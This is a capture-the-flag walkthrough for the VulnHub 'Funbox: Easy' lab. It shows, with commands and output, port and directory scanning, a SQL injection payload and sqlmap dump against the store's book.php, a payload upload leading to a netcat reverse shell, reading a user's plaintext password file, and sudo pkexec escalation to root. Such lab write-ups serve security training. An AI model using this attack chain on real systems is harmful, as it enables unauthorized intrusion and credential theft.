Machine Link : https://www.vulnhub.com/entry/funbox-easy,526/


STEP1
arp-scan -l
FINDING
192.168.0.105
-------------------------------------------------------------------------------------------------
STEP2
nmap -sSV -A -Pn -p- 192.168.0.105
FINDING
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
33060/tcp open  mysqlx  MySQL X protocol listener
-------------------------------------------------------------------------------------------------
STEP3
dirb http://192.168.0.105

FINDING
+ http://192.168.0.105/robots.txt (CODE:200|SIZE:14)                                                                 
== DIRECTORY: http://192.168.0.105/secret/                                                                          
+ http://192.168.0.105/server-status (CODE:403|SIZE:278)                                                             
== DIRECTORY: http://192.168.0.105/store/  
---- Entering directory: http://192.168.0.105/admin/ ----
== DIRECTORY: http://192.168.0.105/admin/assets/   
---- Entering directory: http://192.168.0.105/store/ ----
+ http://192.168.0.105/store/admin.php (CODE:200|SIZE:3153)                                                          
== DIRECTORY: http://192.168.0.105/store/controllers/                                                               
== DIRECTORY: http://192.168.0.105/store/database/                                                                  
== DIRECTORY: http://192.168.0.105/store/functions/                                                                 
+ http://192.168.0.105/store/index.php (CODE:200|SIZE:3998)                                                          
== DIRECTORY: http://192.168.0.105/store/models/                                                                    
== DIRECTORY: http://192.168.0.105/store/template/  
http://192.168.0.105/store/

http://192.168.0.105/store/admin.php

http://192.168.0.105/secret/

„Anyone who lives within their means suffers from a lack of imagination.“ Oscar Wilde (*1854 - †1900) 
http://192.168.0.105/admin/

-------------------------------------------------------------------------------------------------
STEP4
nikto --host http://192.168.0.105 
FINDING
+ /admin/: This might be interesting.
+ /secret/: This might be interesting.
+ /store/: This might be interesting.
+ /admin/index.php: This might be interesting: has been seen in web logs from an unknown scanner.
+ 8103 requests: 0 error(s) and 12 item(s) reported on remote host
-------------------------------------------------------------------------------------------------
STEP5
dirsearch -u http://192.168.0.105

FINDING
http://192.168.0.105/index.php

http://192.168.0.105/index.php/login/registration.php

-------------------------------------------------------------------------------------------------
STEP6
http://192.168.31.119/store/book.php?bookisbn=978-1-49192-706-9

CHANGE IT TO
http://192.168.31.119/store/book.php?bookisbn=1%27+or+1=1--

FINDING
Cant retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near  at line 1
-------------------------------------------------------------------------------------------------
STEP7
sqlmap http://192.168.31.119/store/book.php?bookisbn= --dump-all --batch -D store
FINDING
+--------------------------------------------------+--------+
| pass                                             | name   |
+--------------------------------------------------+--------+
| d033e22ae348aeb5660fc2140aec35850c4da997 (admin) | admin  |
+--------------------------------------------------+--------+
-------------------------------------------------------------------------------------------------
STEP8
http://192.168.31.119/store/book.php?bookisbn=978-1-49192-706-9

http://192.168.0.105/store/admin.php

admin - admin -- use as user id and password
FINDING
http://192.168.31.119/store/admin_book.php

-------------------------------------------------------------------------------------------------
STEP9
add a new record
upload a payload
-------------------------------------------------------------------------------------------------
STEP10 
nc -nvlp 192.168.31.119 on new terminal
hit -- http://192.168.31.119/store/

get a reverse shell
-------------------------------------------------------------------------------------------------
STEP11
cd /home
cd tony
ls -la
cat password.txt
FINDING
ssh: yxcvbnmYYY
gym/admin: asdfghjklXXX
/store: [email protected] admin
-------------------------------------------------------------------------------------------------
STEP12
on new terminal
ssh [email protected]
pwd : yxcvbnmYYY
sudo -l
FINDING
 (root) NOPASSWD: /usr/bin/yelp
    (root) NOPASSWD: /usr/bin/dmf
    (root) NOPASSWD: /usr/bin/whois
    (root) NOPASSWD: /usr/bin/rlogin
    (root) NOPASSWD: /usr/bin/pkexec
    (root) NOPASSWD: /usr/bin/mtr
    (root) NOPASSWD: /usr/bin/finger
    (root) NOPASSWD: /usr/bin/time
    (root) NOPASSWD: /usr/bin/cancel
    (root) NOPASSWD: /root/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/q/r/s/t/u/v/w/x/y/z/.smile.sh
-------------------------------------------------------------------------------------------------
STEP13
https://gtfobins.github.io/gtfobins/pkexec/#sudo

FINDING
sudo pkexec /bin/sh
whoami
root
cd /root
ls -la
car root.flag
 __________          ___.                      ___________                     
\_   _____/_ __  ____\_ |__   _______  ___ /\  \_   _____/____    _________.__.
 |    __)|  |  \/    \| __ \ /  _ \  \/  / \/   |    __)_\__  \  /  ___   |  |
 |     \ |  |  /   |  \ \_\ (  _       /\   |        \/ __ \_\___ \ \___  |
 \___  / |____/|___|  /___  /\____/__/\_ \ \/  /_______  (____  /____  / ____|
     \/             \/    \/            \/             \/     \/     \/ \/     
-------------------------------------------------------------------------------------------------
                             

Related articles